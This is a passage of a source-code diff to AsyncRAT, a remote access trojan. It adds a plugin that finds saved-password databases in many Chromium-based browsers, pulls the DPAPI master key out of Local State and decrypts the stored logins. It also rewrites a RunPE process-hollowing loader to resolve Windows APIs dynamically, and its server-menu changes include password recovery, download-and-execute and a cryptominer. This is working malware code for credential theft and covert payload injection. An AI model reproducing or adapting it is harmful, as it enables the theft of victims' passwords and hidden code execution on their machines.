- break;
- case 1:
- Pass.Append("\n== Opera ===========\n");
- break;
- case 2:
- Pass.Append("\n== Vivaldi ===========\n");
- break;
- case 3:
- Pass.Append("\n== Chromium ===========\n");
- break;
- case 4:
- Pass.Append("\n== Torch ===========\n");
- break;
- case 5:
- Pass.Append("\n== Comodo ===========\n");
- break;
- case 6:
- Pass.Append("\n== Xpom ===========\n");
- break;
- case 7:
- Pass.Append("\n== Orbitum ===========\n");
- break;
- case 8:
- Pass.Append("\n== Kometa ===========\n");
- break;
- case 9:
- Pass.Append("\n== Amigo ===========\n");
- break;
- case 10:
- Pass.Append("\n== Nichrome ===========\n");
- break;
- case 11:
- Pass.Append("\n== Brave ===========\n");
- break;
- case 12:
- Pass.Append("\n== Yandex ===========\n");
- Pass.Append("Not Work for now!\n");
- break;
- }
-
- for (int j = 0; j <= sqliteHandler.GetRowCount() - 1; j++)
- {
- string value = sqliteHandler.GetValue(j, "origin_url");
- string value2 = sqliteHandler.GetValue(j, "username_value");
- string value3 = sqliteHandler.GetValue(j, "password_value");
- string text = string.Empty;
- if (!string.IsNullOrEmpty(value3))
- {
- text = this.Decrypt(Encoding.Default.GetBytes(value3));
- }
- else
- {
- text = "";
- }
- Pass.Append(string.Concat(new string[]
- {
- value,
- "\nU: ",
- value2,
- "\nP: ",
- text,
- "\n\n"
- }));
- }
+ if (masterKey == null)
+ continue;
+ password = DecryptWithKey(Encoding.Default.GetBytes(password), masterKey);
}
-
- selected++;
+ else
+ password = Decrypt(password); //Old versions using UnprotectData for decryption without any key
}
+ else
+ continue;
+
+ if (!string.IsNullOrEmpty(host) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
+ data.Add(new Account() { URL = host, UserName = username, Password = password, Application = browser });
}
- catch (Exception)
+ catch (Exception ex)
{
+ Console.WriteLine(ex.ToString());
}
}
}
- catch
+
+ return data;
+ }
+
+ private static List GetAllProfiles(string DirectoryPath)
+ {
+ List loginDataFiles = new List
{
+ DirectoryPath + @"\Default\Login Data",
+ DirectoryPath + @"\Login Data"
+ };
+
+ if (Directory.Exists(DirectoryPath))
+ {
+ foreach (string dir in Directory.GetDirectories(DirectoryPath))
+ {
+ if (dir.Contains("Profile"))
+ loginDataFiles.Add(dir + @"\Login Data");
+ }
+ }
+
+ return loginDataFiles;
+ }
+
+ public static string DecryptWithKey(byte[] encryptedData, byte[] MasterKey)
+ {
+ byte[] iv = new byte[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; // IV 12 bytes
+
+ //trim first 3 bytes(signature "v10") and take 12 bytes after signature.
+ Array.Copy(encryptedData, 3, iv, 0, 12);
+
+ try
+ {
+ //encryptedData without IV
+ byte[] Buffer = new byte[encryptedData.Length - 15];
+ Array.Copy(encryptedData, 15, Buffer, 0, encryptedData.Length - 15);
+
+ byte[] tag = new byte[16]; //AuthTag
+ byte[] data = new byte[Buffer.Length - tag.Length]; //Encrypted Data
+
+ //Last 16 bytes for tag
+ Array.Copy(Buffer, Buffer.Length - 16, tag, 0, 16);
+
+ //encrypted password
+ Array.Copy(Buffer, 0, data, 0, Buffer.Length - tag.Length);
+
+ AesGcm aesDecryptor = new AesGcm();
+ var result = Encoding.UTF8.GetString(aesDecryptor.Decrypt(MasterKey, iv, null, data, tag));
+
+ return result;
+ }
+ catch (Exception ex)
+ {
+ Console.WriteLine(ex.ToString());
+ return null;
}
}
- private string Decrypt(byte[] Datas)
+ public static byte[] GetMasterKey(string LocalStateFolder)
{
- string result;
+ //Key saved in Local State file
+ string filePath = LocalStateFolder + @"\Local State";
+ byte[] masterKey = new byte[] { };
+
+ if (File.Exists(filePath) == false)
+ return null;
+
+ //Get key with regex.
+ var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath));
+
+ foreach (System.Text.RegularExpressions.Match prof in pattern)
+ {
+ if (prof.Success)
+ masterKey = Convert.FromBase64String((prof.Groups[1].Value)); //Decode base64
+ }
+
+ //Trim first 5 bytes. Its signature "DPAPI"
+ byte[] temp = new byte[masterKey.Length - 5];
+ Array.Copy(masterKey, 5, temp, 0, masterKey.Length - 5);
+
try
{
- Chromium.DATA_BLOB data_BLOB = default(Chromium.DATA_BLOB);
- Chromium.DATA_BLOB data_BLOB2 = default(Chromium.DATA_BLOB);
- GCHandle gchandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
- Chromium.DATA_BLOB data_BLOB3;
- data_BLOB3.pbData = gchandle.AddrOfPinnedObject();
- data_BLOB3.cbData = Datas.Length;
- gchandle.Free();
- Chromium.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT = default(Chromium.CRYPTPROTECT_PROMPTSTRUCT);
- string empty = string.Empty;
- Chromium.CryptUnprotectData(ref data_BLOB3, null, ref data_BLOB2, (IntPtr)0, ref cryptprotect_PROMPTSTRUCT, (Chromium.CryptProtectFlags)0, ref data_BLOB);
- byte[] array = new byte[data_BLOB.cbData + 1];
- Marshal.Copy(data_BLOB.pbData, array, 0, data_BLOB.cbData);
- string @string = Encoding.UTF8.GetString(array);
- result = @string.Substring(0, @string.Length - 1);
+ return ProtectedData.Unprotect(temp, null, DataProtectionScope.CurrentUser);
}
- catch
+ catch (Exception ex)
{
- result = "";
+ Console.WriteLine(ex.ToString());
+ return null;
+ }
+ }
+
+ public static string Decrypt(string encryptedData)
+ {
+ if (encryptedData == null || encryptedData.Length == 0)
+ return null;
+ try
+ {
+ return Encoding.UTF8.GetString(ProtectedData.Unprotect(Encoding.Default.GetBytes(encryptedData), null, DataProtectionScope.CurrentUser));
+ }
+ catch (Exception ex)
+ {
+ Console.WriteLine(ex.ToString());
+ return null;
}
- return result;
}
private string[] GetAppDataFolders()
@@ -279,52 +438,5 @@ namespace Plugin.Browsers.Chromium
}
return list.ToArray();
}
-
- [DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool CryptProtectData(ref Chromium.DATA_BLOB pDataIn, string szDataDescr, ref Chromium.DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref Chromium.CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, Chromium.CryptProtectFlags dwFlags, ref Chromium.DATA_BLOB pDataOut);
-
- [DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool CryptUnprotectData(ref Chromium.DATA_BLOB pDataIn, StringBuilder szDataDescr, ref Chromium.DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref Chromium.CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, Chromium.CryptProtectFlags dwFlags, ref Chromium.DATA_BLOB pDataOut);
-
- [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
- private struct DATA_BLOB
- {
- public int cbData;
-
- public IntPtr pbData;
- }
-
- [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
- private struct CRYPTPROTECT_PROMPTSTRUCT
- {
- public int cbSize;
-
- public Chromium.CryptProtectPromptFlags dwPromptFlags;
-
- public IntPtr hwndApp;
-
- public string szPrompt;
- }
-
- [Flags]
- private enum CryptProtectPromptFlags
- {
- CRYPTPROTECT_PROMPT_ON_UNPROTECT = 1,
- CRYPTPROTECT_PROMPT_ON_PROTECT = 2
- }
-
- [Flags]
- private enum CryptProtectFlags
- {
- CRYPTPROTECT_UI_FORBIDDEN = 1,
- CRYPTPROTECT_LOCAL_MACHINE = 4,
- CRYPTPROTECT_CRED_SYNC = 8,
- CRYPTPROTECT_AUDIT = 16,
- CRYPTPROTECT_NO_RECOVERY = 32,
- CRYPTPROTECT_VERIFY_PROTECTION = 64
- }
-
}
}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
index c395bab..2c0712e 100644
--- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
@@ -12,11 +12,11 @@ namespace Plugin
{
StringBuilder Credentials = new StringBuilder();
new Browsers.Firefox.Firefox().CredRecovery(Credentials);
- new Browsers.Chromium.Chromium().Recovery(Credentials);
+ Browsers.Chromium.Chromium.Recovery(Credentials);
StringBuilder Cookies = new StringBuilder();
new Browsers.Firefox.Firefox().CookiesRecovery(Cookies);
- new Browsers.Chromium.Chromium().CookiesRecovery(Cookies);
+ //new Browsers.Chromium.Chromium().CookiesRecovery(Cookies);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
index b473ae6..aa5d663 100644
--- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
@@ -48,6 +48,7 @@
..\..\..\packages\System.Data.SQLite.Core.1.0.111.0\lib\net40\System.Data.SQLite.dll
True
+
@@ -55,6 +56,9 @@
+
+
+
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
index e8b5aa6..ea63de3 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
@@ -88,7 +88,7 @@ namespace Plugin.Handler
{
try
{
- RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), "", true);
+ RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer));
}
catch (Exception ex)
{
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
index ea40662..596e85f 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
@@ -35,11 +35,11 @@ namespace Plugin
break;
}
- case "xmr":
- {
- new HandleMiner(unpack_msgpack);
- break;
- }
+ //case "xmr":
+ // {
+ // new HandleMiner(unpack_msgpack);
+ // break;
+ // }
}
}
catch (Exception ex)
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
index 509f8cc..0477111 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
@@ -10,29 +10,50 @@ namespace Plugin
{
public static class RunPE
{
- //github.com/Artiist/RunPE-Process-Protection/blob/master/RunPE.cs
- [DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = CharSet.Unicode), SuppressUnmanagedCodeSecurity]
- private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
- [DllImport("kernel32.dll", EntryPoint = "GetThreadContext"), SuppressUnmanagedCodeSecurity]
- private static extern bool GetThreadContext(IntPtr thread, int[] context);
- [DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext"), SuppressUnmanagedCodeSecurity]
- private static extern bool Wow64GetThreadContext(IntPtr thread, int[] context);
- [DllImport("kernel32.dll", EntryPoint = "SetThreadContext"), SuppressUnmanagedCodeSecurity]
- private static extern bool SetThreadContext(IntPtr thread, int[] context);
- [DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext"), SuppressUnmanagedCodeSecurity]
- private static extern bool Wow64SetThreadContext(IntPtr thread, int[] context);
- [DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory"), SuppressUnmanagedCodeSecurity]
- private static extern bool ReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
- [DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory"), SuppressUnmanagedCodeSecurity]
- private static extern bool WriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
- [DllImport("ntdll.dll", EntryPoint = "NtUnmapViewOfSection"), SuppressUnmanagedCodeSecurity]
- private static extern int NtUnmapViewOfSection(IntPtr process, int baseAddress);
- [DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx"), SuppressUnmanagedCodeSecurity]
- private static extern int VirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
- [DllImport("kernel32.dll", EntryPoint = "ResumeThread"), SuppressUnmanagedCodeSecurity]
- private static extern int ResumeThread(IntPtr handle);
- [StructLayout(LayoutKind.Sequential, Pack = 2 - 1)]
+ #region API delegate
+ private delegate int DelegateResumeThread(IntPtr handle);
+ private delegate bool DelegateWow64SetThreadContext(IntPtr thread, int[] context);
+ private delegate bool DelegateSetThreadContext(IntPtr thread, int[] context);
+ private delegate bool DelegateWow64GetThreadContext(IntPtr thread, int[] context);
+ private delegate bool DelegateGetThreadContext(IntPtr thread, int[] context);
+ private delegate int DelegateVirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
+ private delegate bool DelegateWriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
+ private delegate bool DelegateReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
+ private delegate int DelegateZwUnmapViewOfSection(IntPtr process, int baseAddress);
+ private delegate bool DelegateCreateProcessA(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes,
+ bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
+ #endregion
+
+
+ #region API
+ private static readonly DelegateResumeThread ResumeThread = LoadApi("kernel32", "ResumeThread");
+ private static readonly DelegateWow64SetThreadContext Wow64SetThreadContext = LoadApi("kernel32", "Wow64SetThreadContext");
+ private static readonly DelegateSetThreadContext SetThreadContext = LoadApi("kernel32", "SetThreadContext");
+ private static readonly DelegateWow64GetThreadContext Wow64GetThreadContext = LoadApi("kernel32", "Wow64GetThreadContext");
+ private static readonly DelegateGetThreadContext GetThreadContext = LoadApi("kernel32", "GetThreadContext");
+ private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi("kernel32", "VirtualAllocEx");
+ private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi("kernel32", "WriteProcessMemory");
+ private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi("kernel32", "ReadProcessMemory");
+ private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi("ntdll", "ZwUnmapViewOfSection");
+ private static readonly DelegateCreateProcessA CreateProcessA = LoadApi("kernel32", "CreateProcessA");
+ #endregion
+
+
+ #region CreateAPI
+ [DllImport("kernel32", SetLastError = true)]
+ private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
+ [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
+ private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
+ private static CreateApi LoadApi(string name, string method)
+ {
+ return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
+ }
+ #endregion
+
+
+ #region Structure
+ [StructLayout(LayoutKind.Sequential, Pack = 0x1)]
private struct ProcessInformation
{
public readonly IntPtr ProcessHandle;
@@ -40,166 +61,91 @@ namespace Plugin
public readonly uint ProcessId;
private readonly uint ThreadId;
}
- [StructLayout(LayoutKind.Sequential, Pack = 3 - 2)]
+ [StructLayout(LayoutKind.Sequential, Pack = 0x1)]
private struct StartupInformation
{
public uint Size;
private readonly string Reserved1;
private readonly string Desktop;
private readonly string Title;
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 18 + 18)] private readonly byte[] Misc;
+ [MarshalAs(UnmanagedType.ByValArray, SizeConst = 0x24)] private readonly byte[] Misc;
private readonly IntPtr Reserved2;
private readonly IntPtr StdInput;
private readonly IntPtr StdOutput;
private readonly IntPtr StdError;
}
+ #endregion
- public static bool Run(string path, byte[] data, string args, bool protect)
- {
- for (int I = 1; I <= 5; I++)
- if (HandleRun(path, data, args, protect)) return true;
- return false;
- }
- private static bool HandleRun(string path, byte[] data, string args, bool protect)
+ public static void Run(string path, byte[] payload)
{
- int readWrite = 0;
- string quotedPath = args;
- StartupInformation si = new StartupInformation();
- ProcessInformation pi = new ProcessInformation();
- si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
- try
+ for (int i = 0; i < 5; i++)
{
- if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 0x00000004u | 0x08000000u, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
- int fileAddress = BitConverter.ToInt32(data, 120 / 2);
- int imageBase = BitConverter.ToInt32(data, fileAddress + 26 + 26);
- int[] context = new int[179];
- context[0] = 32769 + 32769;
- if (IntPtr.Size == 8 / 2)
- { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
- else
- { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
- int ebx = context[41];
- int baseAddress = 1 - 1;
- if (!ReadProcessMemory(pi.ProcessHandle, ebx + 4 + 4, ref baseAddress, 2 + 2, ref readWrite)) throw new Exception();
- if (imageBase == baseAddress)
- if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 1 - 1) throw new Exception();
- int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 160 / 2);
- int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 42 + 42);
- bool allowOverride = false;
- int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 6144 + 6144, 32 + 32);
-
- if (newImageBase == 0) throw new Exception();
- if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite)) throw new Exception();
- int sectionOffset = fileAddress + 124 * 2;
- short numberOfSections = BitConverter.ToInt16(data, fileAddress + 3 + 3);
- for (int I = 1 - 1; I < numberOfSections; I++)
+ int readWrite = 0x0;
+ StartupInformation si = new StartupInformation();
+ ProcessInformation pi = new ProcessInformation();
+ si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
+ try
{
- int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 6 + 6);
- int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 8 + 8);
- int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 40 / 2);
- if (sizeOfRawData != 1 - 1)
+ if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 0x00000004 | 0x08000000, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
+ int fileAddress = BitConverter.ToInt32(payload, 0x3C);
+ int imageBase = BitConverter.ToInt32(payload, fileAddress + 0x34);
+ int[] context = new int[0xB3];
+ context[0x0] = 0x10002;
+ if (IntPtr.Size == 0x4)
+ { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
+ else
+ { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
+ int ebx = context[0x29];
+ int baseAddress = 0x0;
+ if (!ReadProcessMemory(pi.ProcessHandle, ebx + 0x8, ref baseAddress, 0x4, ref readWrite)) throw new Exception();
+ if (imageBase == baseAddress)
+ if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0x0) throw new Exception();
+ int sizeOfImage = BitConverter.ToInt32(payload, fileAddress + 0x50);
+ int sizeOfHeaders = BitConverter.ToInt32(payload, fileAddress + 0x54);
+ bool allowOverride = false;
+ int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 0x3000, 0x40);
+
+ if (newImageBase == 0x0) throw new Exception();
+ if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception();
+ int sectionOffset = fileAddress + 0xF8;
+ short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 0x6);
+ for (int I = 0; I < numberOfSections; I++)
{
- byte[] sectionData = new byte[sizeOfRawData];
- Buffer.BlockCopy(data, pointerToRawData, sectionData, 2 - 2, sectionData.Length);
- if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
+ int virtualAddress = BitConverter.ToInt32(payload, sectionOffset + 0xC);
+ int sizeOfRawData = BitConverter.ToInt32(payload, sectionOffset + 0x10);
+ int pointerToRawData = BitConverter.ToInt32(payload, sectionOffset + 0x14);
+ if (sizeOfRawData != 0x0)
+ {
+ byte[] sectionData = new byte[sizeOfRawData];
+ Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0x0, sectionData.Length);
+ if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
+ }
+ sectionOffset += 0x28;
}
- sectionOffset += 120 / 3;
- }
- byte[] pointerData = BitConverter.GetBytes(newImageBase);
- if (!WriteProcessMemory(pi.ProcessHandle, ebx + 16 / 2, pointerData, 2 * 2, ref readWrite)) throw new Exception();
- int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 80 / 2);
- if (allowOverride) newImageBase = imageBase;
- context[22 + 22] = newImageBase + addressOfEntryPoint;
+ byte[] pointerData = BitConverter.GetBytes(newImageBase);
+ if (!WriteProcessMemory(pi.ProcessHandle, ebx + 0x8, pointerData, 0x4, ref readWrite)) throw new Exception();
+ int addressOfEntryPoint = BitConverter.ToInt32(payload, fileAddress + 0x28);
+ if (allowOverride) newImageBase = imageBase;
+ context[0x2C] = newImageBase + addressOfEntryPoint;
- if (IntPtr.Size == 2 + 2)
+ if (IntPtr.Size == 0x4)
+ {
+ if (!SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
+ }
+ else
+ {
+ if (!Wow64SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
+ }
+ if (ResumeThread(pi.ThreadHandle) == -1) throw new Exception();
+ }
+ catch
{
- if (!SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
+ Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
+ continue;
}
- else
- {
- if (!Wow64SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
- }
- if (ResumeThread(pi.ThreadHandle) == -1) throw new Exception();
- if (protect) Protect(pi.ProcessHandle);
+ break;
}
- catch
- {
- Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
- return false;
- }
- return true;
- }
-
- [DllImport("advapi32.dll", SetLastError = true)]
- private static extern bool GetKernelObjectSecurity(IntPtr Handle, int securityInformation, [Out] byte[] pSecurityDescriptor, uint nLength, ref uint lpnLengthNeeded);
-
- [DllImport("advapi32.dll", SetLastError = true)]
- private static extern bool SetKernelObjectSecurity(IntPtr Handle, int securityInformation, [In] byte[] pSecurityDescriptor);
-
- private static void SetProcessSecurityDescriptor(IntPtr processHandle, RawSecurityDescriptor rawSecurityDescriptor)
- {
- byte[] array = new byte[checked(rawSecurityDescriptor.BinaryLength - 1 + 1 - 1 + 1)];
- rawSecurityDescriptor.GetBinaryForm(array, 0);
- bool flag = !SetKernelObjectSecurity(processHandle, 4, array);
- if (flag)
- {
- throw new Win32Exception();
- }
- }
-
- private static T InlineAssignHelper(ref T target, T value)
- {
- target = value;
- return value;
- }
-
- private static RawSecurityDescriptor GetProcessSecurityDescriptor(IntPtr processHandle)
- {
- byte[] array = new byte[0];
- uint bufferSize = new uint();
- GetKernelObjectSecurity(processHandle, 4, array, 0u, ref bufferSize);
- if (bufferSize < 0 || bufferSize > short.MaxValue)
- {
- throw new Win32Exception();
- }
-
- bool cdt = !GetKernelObjectSecurity(processHandle, 4, InlineAssignHelper(ref array, new byte[checked((int)(unchecked((ulong)bufferSize) - 1UL) + 1 - 1 + 1)]), bufferSize, ref bufferSize);
- if (cdt)
- {
- throw new Win32Exception();
- }
- return new RawSecurityDescriptor(array, 0);
- }
-
- private static void Protect(IntPtr processHandle)
- {
- RawSecurityDescriptor rawSecurityDescriptor = GetProcessSecurityDescriptor(processHandle);
- rawSecurityDescriptor.DiscretionaryAcl.InsertAce(0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 987135, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null));
- SetProcessSecurityDescriptor(processHandle, rawSecurityDescriptor);
- }
-
- private enum ProcessAccessRights
- {
- DELETE = 65536,
- ITE_OWNER = 524288,
- PROCESS_ALL_ACCESS = 987135,
- PROCESS_CREATE_PROCESS = 128,
- PROCESS_CREATE_THREAD = 2,
- PROCESS_DUP_HANDLE = 64,
- PROCESS_QUERY_INFORMATION = 1024,
- PROCESS_QUERY_LIMITED_INFORMATION = 4096,
- PROCESS_SET_INFORMATION = 512,
- PROCESS_SET_QUOTA = 256,
- PROCESS_SUSPEND_RESUME = 2048,
- PROCESS_TERMINATE = 1,
- PROCESS_VM_OPERATION = 8,
- PROCESS_VM_READ = 16,
- PROCESS_VM_WRITE = 32,
- READ_CONTROL = 131072,
- STANDARD_RIGHTS_REQUIRED = 983040,
- SYNCHRONIZE = 256,
- WRITE_DAC = 262144
}
}
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
index bb691b5..5caedaa 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/SendFile.csproj
@@ -45,7 +45,6 @@
-
diff --git a/AsyncRAT-C#/Server/Forms/Form1.Designer.cs b/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
index d11a853..58958d0 100644
--- a/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/Form1.Designer.cs
@@ -41,10 +41,45 @@
this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_av = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_ping = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
- this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.lv_act = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuClient = new System.Windows.Forms.ContextMenuStrip(this.components);
- this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator();
+ this.toolStripSeparator1 = new System.Windows.Forms.ToolStripSeparator();
+ this.toolStripSeparator5 = new System.Windows.Forms.ToolStripSeparator();
+ this.statusStrip1 = new System.Windows.Forms.StatusStrip();
+ this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.ping = new System.Windows.Forms.Timer(this.components);
+ this.UpdateUI = new System.Windows.Forms.Timer(this.components);
+ this.tabControl1 = new System.Windows.Forms.TabControl();
+ this.tabPage1 = new System.Windows.Forms.TabPage();
+ this.tabPage2 = new System.Windows.Forms.TabPage();
+ this.listView2 = new System.Windows.Forms.ListView();
+ this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.contextMenuLogs = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.cLEARToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.tabPage3 = new System.Windows.Forms.TabPage();
+ this.listView3 = new System.Windows.Forms.ListView();
+ this.contextMenuThumbnail = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.ThumbnailImageList = new System.Windows.Forms.ImageList(this.components);
+ this.tabPage4 = new System.Windows.Forms.TabPage();
+ this.listView4 = new System.Windows.Forms.ListView();
+ this.columnHeader4 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.columnHeader5 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
+ this.contextMenuTasks = new System.Windows.Forms.ContextMenuStrip(this.components);
+ this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.downloadAndExecuteToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.sENDFILETOMEMORYToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
+ this.minerToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
+ this.uPDATEToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
+ this.toolStripSeparator4 = new System.Windows.Forms.ToolStripSeparator();
+ this.dELETETASKToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
+ this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
+ this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
+ this.TimerTask = new System.Windows.Forms.Timer(this.components);
